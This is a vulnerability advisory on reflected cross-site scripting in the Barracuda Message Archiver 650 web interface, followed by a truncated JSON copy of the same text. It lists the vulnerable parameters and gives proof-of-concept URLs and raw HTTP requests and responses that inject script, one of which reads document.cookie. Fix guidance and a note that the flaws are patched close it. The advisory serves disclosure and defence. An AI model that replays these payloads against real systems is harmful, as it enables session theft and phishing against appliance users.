Search...

Barracuda #38 Message Archiver - Multiple Vulnerabilities

2016-01-08T00:00:00

ID VULNERLAB:1108
Type vulnerlab
Reporter Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]
Modified 2016-01-08T00:00:00

Description

                                        
                                            Document Title:
===============
Barracuda #38 Message Archiver - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1108

Barracuda Networks Security ID (BNSEC): BNSEC-1530


Release Date:
=============
2016-01-08


Vulnerability Laboratory ID (VL-ID):
====================================
1108


Common Vulnerability Scoring System:
====================================
3


Product & Service Introduction:
===============================
Barracuda Networks, Inc. offers industry-leading solutions designed to solve mainstream IT problems – efficiently and 
cost effectively – while maintaining a level of customer support and satisfaction second to none. Their products span 
three distinct markets, including:

1. Content security,
2. Networking and application delivery,
3. Data storage, protection and disaster recovery.

While Barracuda Networks maintain a strong heritage in email and web security appliances, their award-winning portfolio 
includes more than a dozen purpose-built solutions that support literally every aspect of the network – providing organizations 
of all sizes with true end-to-end protection that can be deployed in hardware, virtual, cloud and mixed form factors.

CitiBank, Coca-Cola, Delta Dental, FedEx, Harvard University, IBM, L`Oreal, Liberty Tax Service, Mythbusters and Spokane Public 
Schools are amongst the more than 150,000 organizations worldwide confidently protecting their users, applications and data with 
Barracuda Networks’ solutions. The company is privately held with its international headquarters and manufacturing facility based 
in Campbell, California. Barracuda Networks has offices in eight international locations and distributors in more than 80 countries.

The Barracuda Message Archiver is a complete and affordable email archiving solution, enabling you to effectively index and preserve 
all emails, enhance operational efficiencies and enforce policies for regulatory compliance. By leveraging standard policies and seamless 
access to messages, email content is fully indexed and backed up to enable administrators, auditors and end users quick retrieval of any 
email message stored in an organization’s email archive.

- Comprehensive archiving
- Exchange stubbing
- Search and retrieval
- Policy management
- Intelligent Storage Manager
- Roles-based interface
- Reporting and statistics

The Barracuda Message Archiver features an easy-to-use Web user interface, creating an intuitive and cost-effective administration tool 
for the integrated hardware and software solution. The Web user interface allows administrators to define, manage and control corporate 
archiving settings and rules from one central location.

(Copy of the Vendor Homepage: http://www.barraguard.com/650.asp )


Abstract Advisory Information:
==============================
The vulnerability Laboratory Research Team has discovered multiple web validation vulnerabilities in the barracuda Message Archiver v650 Product.



Vulnerability Disclosure Timeline:
==================================
2016-01-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Barracuda Networks
Product: Message Archiver 650 - Appliance Application 3.2.0.924


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
Multiple client side cross site web vulnerabilities has been discovered in the official Barracuda Networks Message Archiver 650 Appliance Web-Application.
The non-persistent cross site scripting web vulnerability allows remote attackers to manipulate client-side web-application to browser requests. 

The payload can be injected in multiple parameters of the affected file in order to successfully exploit this web vulnerability. 
The vulnerability affects the `view_message_log_detail.cgi` file and the code execution happens when the application renders an error 
handling exception or handles an event. During the testing, the value of the vulnerable request parameters was copied into the value 
of an HTML tag attribute which was an event handler and or exception handler and was encapsulated in double quotation marks. The payload 
ea120`\"&gt;&lt;script&gt;alert(1)&lt;/script&gt;9335e4791a6 was submitted in all affected parameters. This input was echoed unmodified in the application`s 
response proving the existence of this vulnerability. These sort of vulnerabilities can result in multiple attack vectors on the client end 
which may eventually result in complete compromise of the end user system. 

Exploitation of this client side cross site scripting web vulnerability requires only low user interaction. Successful exploitation of
the vulnerability may result in malicious script code being executed in the victims browser resulting in script code injection, phishing, 
client-side redirects and similar client-side web attacks.


Vulnerable File(s):
				[+] view_message_log_detail.cgi

Vulnerable Parameter(s):
				[+] /cgi-mod/view_message_log_detail.cgi [et parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [locale parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [password parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [primary_tab parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [realm parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [secondary_tab parameter]

Affected Files(s):
				[+] /cgi-mod/view_message_log_detail.cgi
				[+] /cgi-mod/get_source.cgi
				[+] /cgi-mod/index.cgi


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers with low or medium required user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


POC URL #1: (XSS in error exception handling)

https://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest
&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_USea120%22%3E
%3Cscript%3Ealert%28/POC/%29%3C/script
%3E9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&
searchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492


POC URL #2: (XSS in event handler)
https://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest
&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=138062631262863%22style%3d%22behavior
%3aurl%28%23default%23time2%29%22onbegin%3d%22alert
%281%29%22d9b8f60df30&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=
archive_searchea120%22%3E%3Cscript%3Ealert%28/POC2/%29%3C/script%3E9335e4791a6&searchid=1ea120%22%3E%3Cscript%3Ealert%28/POC2/%29%3C
/script%3E9335e4791a6&action=readmessage&scrollbars=yes&resizable=yes&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492


POC URL #3: (document cookie)
https://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=
1380626312&locale=en_USea120%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script
%3E9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&
action=readmessage&scrollbars=yes&resizable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492



Source Code (Exception Handling)
&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body onload="window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab=
archive_search&locale=en_US46728"&gt;&lt;script&gt;alert(/test/)
&lt;/script&gt;ef4164cbd7e'"&gt; &lt;/body&gt;&lt;/html&gt;


Source Code (Event Handling)
&lt;td valign=top height=5 class=message_detail width=80 valign=top &gt;&lt;nobr&gt;&lt;b&gt;Subject:&lt;/b&gt;&lt;/nobr&gt;&lt;/td&gt;
&lt;td valign=top class=message_detail width=614 height=5 colspan=5&gt;BC_216.129.99.129&lt;/td&gt;&lt;td height=5 width=3 class=message_detail&gt; &lt;/td&gt;
&lt;/tr&gt;&lt;td valign=top height=5 class=message_detail width=80 valign=top &gt;&lt;nobr&gt;&lt;b&gt;Date:&lt;/b&gt;&lt;/nobr&gt;&lt;/td&gt;
&lt;td valign=top class=message_detail width=267 height=5 colspan=1&gt;2013-09-30 21:30:59&lt;br&gt;
&lt;a href="/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=138062631262863"
style="behavior:url(#default#time2)"onbegin="alert(1)"d9b8f60df30&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC&
secondary_tab=archive_searchea120"&gt;&lt;script&gt;alert(/POC2/)
&lt;/script&gt;9335e4791a6&file=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=1&email=guest"&gt;Download&lt;/a&gt;&lt;/td&gt;
&lt;td height=5 width=3 class=message_detail&gt; &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;


POC HTTP Requests:
Request #1 (et):
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006"&gt;&lt;script&gt;alert(1)
&lt;/script&gt;f8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&
searchid=1&action=readmessage&scrollbars=yes&resi
zable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?

auth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest
Cookie: ys-folder_list=o%3Acollapsed%3Db%253A1
Connection: keep-alive



Response #1
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Mon, 01 Oct 2012 12:34:31 GMT
Date: Tue, 01 Oct 2013 12:34:31 GMT
Content-Length: 8431

&lt;html style="margin:0;padding:0;height:100%"&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;title&gt;BC_216.129.99.129&lt;/title&gt;
&lt;link rel="stylesheet" type="text/css" href="/barr
...
&lt;a href="/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006"&gt;&lt;script&gt;alert(1)
&lt;/script&gt;f8eb700f5ef&id=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC&secondary_tab=archive_search&file=0|
d/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=



Request #2 (en_US)
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_USea120"&gt;&lt;script&gt;alert(1)

&lt;/script&gt;9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&action=readmessage&
scrollbars=yes&resizable=yes&id=

0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?

auth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest
Cookie: ys-folder_list=o%3Acollapsed%3Db%253A1
Connection: keep-alive


Response #2
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Sun, 02 Oct 2011 12:36:25 GMT
Date: Tue, 01 Oct 2013 12:36:25 GMT
Content-Length: 177

&lt;html&gt;&lt;body onLoad="window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab=archive_search&locale=en_USea120"&gt;&lt;script&gt;alert(1)

&lt;/script&gt;9335e4791a6'"&gt; &lt;/body&gt;&lt;/html&gt;


Request #3 (password)
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a66f1ff"&gt;&lt;script&gt;alert(1)&lt;/script&gt;e2b3b338db0&
et=13806263121c006%22%3E
%3Cscript%3Ealert(1)%3C/script
%3Ef8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&
action=readmessage&scrollbars=yes&resizable=

yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ys-folder_list=javascript%3Aalert%282%29; 
ys-details_south=o%3Acollapsed%3Db%253A1; 
ys-details_east=o%3Acollapsed%3Db%253A0; 
ys-details_west=o%3Acollapsed%3Db
%253A1


Response #3
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Mon, 01 Oct 2012 18:23:09 GMT
Date: Tue, 01 Oct 2013 18:23:09 GMT
Content-Length: 8474

&lt;html style="margin:0;padding:0;height:100%"&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;title&gt;BC_216.129.99.129&lt;/title&gt;
&lt;link rel="stylesheet" type="text/css" href="/barr
...
&lt;a href="/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=&password=506b7912f7dc85d2feb3663f1ee4a1a66f1ff"&gt;&lt;script&gt;alert(1)
&lt;/script&gt;e2b3b338db0&et=13806263121c006"&gt;
...


Request #4 (primary_tab)
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006%22%3E%3Cscript%3Ealert(1)%3C/script
%3Ef8eb700f5ef&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC2cc86&lt;script&gt;alert(1)

&lt;/script&gt;4b6dfc58551&secondary_tab=archive_search&searchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ys-folder_list=javascript%3Aalert%282%29; 
ys-details_south=o%3Acollapsed%3Db%253A1; 
ys-details_east=o%3Acollapsed%3Db%253A0; 
ys-details_west=o%3Acollapsed%3Db
%253A1
Connection: keep-alive


Response #4
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Mon, 01 Oct 2012 18:40:02 GMT
Date: Tue, 01 Oct 2013 18:40:02 GMT
Content-Length: 8525

&lt;html style="margin:0;padding:0;height:100%"&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;title&gt;BC_216.129.99.129&lt;/title&gt;
&lt;link rel="stylesheet" type="text/css" href="/barr
...
&lt;/script&gt;f8eb700f5ef&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&id_hash=fa601415b5fa922e38d90c5f2ea1ad94&machine=&primary_tab=BASIC2cc86&lt;script&gt;alert(1)

&lt;/script&gt;4b6dfc58551&secondary_tab=archive_search&file=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492&download=1&email=guest"&gt;
...


Request #5 (realm)
GET /cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006%22%3E%3Cscript%3Ealert(1)%3C/script
%3Ef8eb700f5ef&locale=en_US&realm=3111a"&gt;&lt;script&gt;alert(1)
&lt;/script&gt;99f8452d662&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|

d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ys-folder_list=javascript%3Aalert%282%29; 
ys-details_south=o%3Acollapsed%3Db%253A1; 
ys-details_east=o%3Acollapsed%3Db%253A0; 
ys-details_west=o%3Acollapsed%3Db
%253A1
Connection: keep-alive


Response #5
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Mon, 01 Oct 2012 18:33:27 GMT
Date: Tue, 01 Oct 2013 18:33:27 GMT
Content-Length: 8474

&lt;html style="margin:0;padding:0;height:100%"&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;title&gt;BC_216.129.99.129&lt;/title&gt;
&lt;link rel="stylesheet" type="text/css" href="/barr
...
&lt;a href="/cgi-mod/get_source.cgi?user=guest&locale=en_US&realm=3111a"&gt;&lt;script&gt;alert(1)
&lt;/script&gt;99f8452d662&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=13806263121c006"&gt;
...


Request #6 (secondary_tab)
GET /cgi-mod/view_message_log_detail.cgi?

user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_US&realm=&auth_type=Local&policy_query=&
primary_tab=BASIC&secondary_tab=archive_searchfd89

2"&gt;&lt;script&gt;alert(1)&lt;/script&gt;4fee14c256a&searchid=1&action=readmessage&scrollbars=yes&resizable=yes
&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492 HTTP/1.1
Host: archiver.ptest.cudasvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://archiver.ptest.cudasvc.com/cgi-mod/index.cgi?

auth_type=Local&et=1380626293&locale=en_US&password=df3cbfe08d7159dc78964b40059f5075&primary_tab=BASIC&secondary_tab=archive_search&user=guest
Cookie: ys-folder_list=o%3Acollapsed%3Db%253A1
Connection: keep-alive


Response #6 
HTTP/1.1 200 OK
Server: BarracudaHTTP 4.0
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Sun, 02 Oct 2011 12:43:18 GMT
Date: Tue, 01 Oct 2013 12:43:18 GMT
Content-Length: 177

&lt;html&gt;&lt;body onLoad="window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab=archive_searchfd892"&gt;&lt;script&gt;alert(1)

&lt;/script&gt;4fee14c256a&locale=en_US'"&gt; &lt;/body&gt;&lt;/html&gt;




Solution - Fix & Patch:
=======================
1. Parse the view_message_log_details.cgi input and encode the attached vulnerable parameters.
2. Parse the vulnerable output parameters in the get_source.cgi and index.cgi files
3. Restrict the input parameters and connect it with the regular appliance model filter mechanism

				[+] /cgi-mod/view_message_log_detail.cgi
				[+] /cgi-mod/get_source.cgi
				[+] /cgi-mod/index.cgi

				[+] /cgi-mod/view_message_log_detail.cgi [et parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [locale parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [password parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [primary_tab parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [realm parameter]
				[+] /cgi-mod/view_message_log_detail.cgi [secondary_tab parameter]


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerabilities are estimated as medium. (CVSS 3.0)

Note: The vulnerability has been patched by the barracuda networks security team. Te patches are already available in the customer section of the service portal.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

JSON Vulners Source

Initial Source

{"sourceData": "Document Title:\r\n===============\r\nBarracuda #38 Message Archiver - Multiple Vulnerabilities\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1108\r\n\r\nBarracuda Networks Security ID (BNSEC): BNSEC-1530\r\n\r\n\r\nRelease Date:\r\n=============\r\n2016-01-08\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1108\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n3\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nBarracuda Networks, Inc. offers industry-leading solutions designed to solve mainstream IT problems \u2013 efficiently and \r\ncost effectively \u2013 while maintaining a level of customer support and satisfaction second to none. Their products span \r\nthree distinct markets, including:\r\n\r\n1. Content security,\r\n2. Networking and application delivery,\r\n3. Data storage, protection and disaster recovery.\r\n\r\nWhile Barracuda Networks maintain a strong heritage in email and web security appliances, their award-winning portfolio \r\nincludes more than a dozen purpose-built solutions that support literally every aspect of the network \u2013 providing organizations \r\nof all sizes with true end-to-end protection that can be deployed in hardware, virtual, cloud and mixed form factors.\r\n\r\nCitiBank, Coca-Cola, Delta Dental, FedEx, Harvard University, IBM, L`Oreal, Liberty Tax Service, Mythbusters and Spokane Public \r\nSchools are amongst the more than 150,000 organizations worldwide confidently protecting their users, applications and data with \r\nBarracuda Networks\u2019 solutions. The company is privately held with its international headquarters and manufacturing facility based \r\nin Campbell, California. Barracuda Networks has offices in eight international locations and distributors in more than 80 countries.\r\n\r\nThe Barracuda Message Archiver is a complete and affordable email archiving solution, enabling you to effectively index and preserve \r\nall emails, enhance operational efficiencies and enforce policies for regulatory compliance. By leveraging standard policies and seamless \r\naccess to messages, email content is fully indexed and backed up to enable administrators, auditors and end users quick retrieval of any \r\nemail message stored in an organization\u2019s email archive.\r\n\r\n- Comprehensive archiving\r\n- Exchange stubbing\r\n- Search and retrieval\r\n- Policy management\r\n- Intelligent Storage Manager\r\n- Roles-based interface\r\n- Reporting and statistics\r\n\r\nThe Barracuda Message Archiver features an easy-to-use Web user interface, creating an intuitive and cost-effective administration tool \r\nfor the integrated hardware and software solution. The Web user interface allows administrators to define, manage and control corporate \r\narchiving settings and rules from one central location.\r\n\r\n(Copy of the Vendor Homepage: http://www.barraguard.com/650.asp )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe vulnerability Laboratory Research Team has discovered multiple web validation vulnerabilities in the barracuda Message Archiver v650 Product.\r\n\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2016-01-08: Public Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nBarracuda Networks\r\nProduct: Message Archiver 650 - Appliance Application 3.2.0.924\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nLow\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nMultiple client side cross site web vulnerabilities has been discovered in the official Barracuda Networks Message Archiver 650 Appliance Web-Application.\r\nThe non-persistent cross site scripting web vulnerability allows remote attackers to manipulate client-side web-application to browser requests. \r\n\r\nThe payload can be injected in multiple parameters of the affected file in order to successfully exploit this web vulnerability. \r\nThe vulnerability affects the `view_message_log_detail.cgi` file and the code execution happens when the application renders an error \r\nhandling exception or handles an event. During the testing, the value of the vulnerable request parameters was copied into the value \r\nof an HTML tag attribute which was an event handler and or exception handler and was encapsulated in double quotation marks. The payload \r\nea120`\\\"><script>alert(1)</script>9335e4791a6 was submitted in all affected parameters. This input was echoed unmodified in the application`s \r\nresponse proving the existence of this vulnerability. These sort of vulnerabilities can result in multiple attack vectors on the client end \r\nwhich may eventually result in complete compromise of the end user system. \r\n\r\nExploitation of this client side cross site scripting web vulnerability requires only low user interaction. Successful exploitation of\r\nthe vulnerability may result in malicious script code being executed in the victims browser resulting in script code injection, phishing, \r\nclient-side redirects and similar client-side web attacks.\r\n\r\n\r\nVulnerable File(s):\r\n\t\t\t\t[+] view_message_log_detail.cgi\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [et parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [locale parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [password parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [primary_tab parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [realm parameter]\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi [secondary_tab parameter]\r\n\r\nAffected Files(s):\r\n\t\t\t\t[+] /cgi-mod/view_message_log_detail.cgi\r\n\t\t\t\t[+] /cgi-mod/get_source.cgi\r\n\t\t\t\t[+] /cgi-mod/index.cgi\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe client-side cross site scripting web vulnerability can be exploited by remote attackers with low or medium required user interaction.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\n\r\nPOC URL #1: (XSS in error exception handling)\r\n\r\nhttps://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest\r\n&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=1380626312&locale=en_USea120%22%3E\r\n%3Cscript%3Ealert%28/POC/%29%3C/script\r\n%3E9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&\r\nsearchid=1&action=readmessage&scrollbars=yes&resizable=yes&id=0|\r\nd/5a/8ccfc64729eba580e2c95995d53b8.0_492\r\n\r\n\r\nPOC URL #2: (XSS in event handler)\r\nhttps://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest\r\n&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=138062631262863%22style%3d%22behavior\r\n%3aurl%28%23default%23time2%29%22onbegin%3d%22alert\r\n%281%29%22d9b8f60df30&locale=en_US&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=\r\narchive_searchea120%22%3E%3Cscript%3Ealert%28/POC2/%29%3C/script%3E9335e4791a6&searchid=1ea120%22%3E%3Cscript%3Ealert%28/POC2/%29%3C\r\n/script%3E9335e4791a6&action=readmessage&scrollbars=yes&resizable=yes&id=0|\r\nd/5a/8ccfc64729eba580e2c95995d53b8.0_492\r\n\r\n\r\nPOC URL #3: (document cookie)\r\nhttps://archiver.ptest.cudasvc.com/cgi-mod/view_message_log_detail.cgi?user=guest&password=506b7912f7dc85d2feb3663f1ee4a1a6&et=\r\n1380626312&locale=en_USea120%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script\r\n%3E9335e4791a6&realm=&auth_type=Local&policy_query=&primary_tab=BASIC&secondary_tab=archive_search&searchid=1&\r\naction=readmessage&scrollbars=yes&resizable=yes&id=0|d/5a/8ccfc64729eba580e2c95995d53b8.0_492\r\n\r\n\r\n\r\nSource Code (Exception Handling)\r\n<html><head></head><body onload=\"window.parent.location='/cgi-mod/index.cgi?error=3&secondary_tab=\r\narchive_search&locale=en_US46728\"><script>alert(/test/)\r\n</script>ef4164cbd7e'\"> </body></html>\r\n\r\n\r\nSource Code (Event Handling)\r\n<td valign=top height=5 class=message_detail width=80 valign=top ><nobr><b>Subject:</b></nobr></td>\r\n<td valign=top class=message_detail width=614 height=5 colspan=5>BC_216.129.99.129</td><td height=5 width=3 class=message_detail> </td>\r\n</tr><td valign=top height=5 class=message_detail width=80 valign=top ><nobr><b>Date:</b></nobr></td>\r\n<td valign=top class=message_detail width=267 height=5 colspan=1>2013-09-30 21:30:59<br>\r\n<a 